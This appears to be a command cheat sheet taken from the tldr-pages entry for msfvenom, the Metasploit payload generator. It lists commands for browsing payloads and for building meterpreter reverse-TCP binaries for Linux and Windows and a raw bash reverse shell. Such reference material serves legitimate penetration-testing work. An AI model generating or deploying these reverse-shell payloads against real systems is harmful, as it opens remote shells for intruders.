; This has been extracted from
; https://github.com/tldr-pages/tldr/blob/master/pages/common/msfvenom.md

% msfvenom, common

# List payloads
msfvenom <__l___list_> payloads

# List formats
msfvenom <__l___list_> formats

# Show payload options
msfvenom <__p___payload_> <payload> --list-options

# Create an ELF binary with a reverse TCP handler
msfvenom <__p___payload_> linux/x64/meterpreter/reverse_tcp LHOST=<local_ip> LPORT=<local_port> <__f___format_> elf <__o___out_> <path_to_binary>

# Create an EXE binary with a reverse TCP handler
msfvenom <__p___payload_> windows/x64/meterpreter/reverse_tcp LHOST=<local_ip> LPORT=<local_port> <__f___format_> exe <__o___out_> <path_to_binary_exe>

# Create a raw Bash with a reverse TCP handler
msfvenom <__p___payload_> cmd/unix/reverse_bash LHOST=<local_ip> LPORT=<local_port> <__f___format_> raw
